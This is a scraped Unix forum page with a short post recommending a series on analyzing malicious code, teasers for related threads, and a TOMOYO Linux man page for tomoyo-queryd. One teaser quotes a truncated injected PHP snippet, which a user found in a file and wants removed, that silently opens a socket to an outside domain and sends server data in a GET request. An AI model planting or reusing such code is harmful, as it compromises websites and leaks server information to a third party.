08-04-2010
How to analyze malicious code
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
These 2 Users Gave Thanks to pludi For This Post:
8 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
I have a file which contains records in the format of
2006-08-25 12:06:13|ABC|93
2006-08-25 12:45:55|ABC|203
2006-08-25 01:48:19|DEF|156
2006-08-25 01:49:09|ABC|12798
2006-08-25 02:49:59|GHL|4109
2006-08-25 03:50:50|DEF|234
where the format is "arrive time"|"message type"|"processing... (3 Replies)
Discussion started by: mpang_
3 Replies
2. Shell Programming and Scripting
Hello,
Please advise a script/command to remove the following line for a file
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER;
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies
3. Solaris
Hi Gurus,
I have installed the stuff needed for patchdiag for patching, its working okay , however after execution of pathcdiag.sparc i am unable to understand the summury which is produced at the end.
Please help !
Thanks (3 Replies)
Discussion started by: kumarmani
3 Replies
4. Shell Programming and Scripting
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies
5. Programming
Hi, I have two files:
Input_file1.txt
124
235
152
178
156
142
178
163
159
Input_file2.txt
124|5623
452|6698
178|9995
235|7542
159|8852 (1 Reply)
Discussion started by: cpp_beginner
1 Replies
6. Solaris
Hi,
Is there any tool is available for analyzing Oracle X86 snapshot output.
Thanks in advance. (1 Reply)
Discussion started by: sunnybee
1 Replies
7. Shell Programming and Scripting
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies
8. Debian
Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position.
Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies
LEARN ABOUT DEBIAN
tomoyo-queryd
TOMOYO-QUERYD(8) System Administration Utilities TOMOYO-QUERYD(8)
NAME
tomoyo-queryd - real-time access request management utility for TOMOYO Linux
SYNOPSIS
tomoyo-queryd
tomoyo-queryd [remote_ip:remote_port]
DESCRIPTION
This program detects policy violations that occur in domains set to enforcing mode. The violation is displayed and a number of options are
given to either grant or reject this request. Programs are frozen until a response is provided by the administrator.
This is useful when upgrading packages on the system, as errors due to changes in permissions can be avoided.
Carefully analyze access requests before you grant them, as they could be coming from a compromised process or malicious attacker.
Before this program can be invoked, you must register it in /sys/kernel/security/tomoyo/manager. After initializing policy, this is usually
as simple as rebooting the system.
OPTIONS
remote_ip:remote_port
Instead of managing local policy violations, manage remote policy via an agent waiting at port remote_port on IP address remote_ip.
EXAMPLES
Handle policy violations on the local system
tomoyo-queryd
Handle policy violations on a remote system
tomoyo-queryd 192.168.1.1:10000
BUGS
If you find any bugs, send an email to <tomoyo-users-en@lists.sourceforge.jp>.
AUTHORS
Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Main author.
Jamie Nguyen <jamie@tomoyolinux.co.uk>
Documentation and website.
SEE ALSO
tomoyo-editpolicy-agent(8), tomoyo-notifyd(8)
See <http://tomoyo.sourceforge.jp> for more information.
tomoyo-tools 2.5.0 2012-04-14 TOMOYO-QUERYD(8)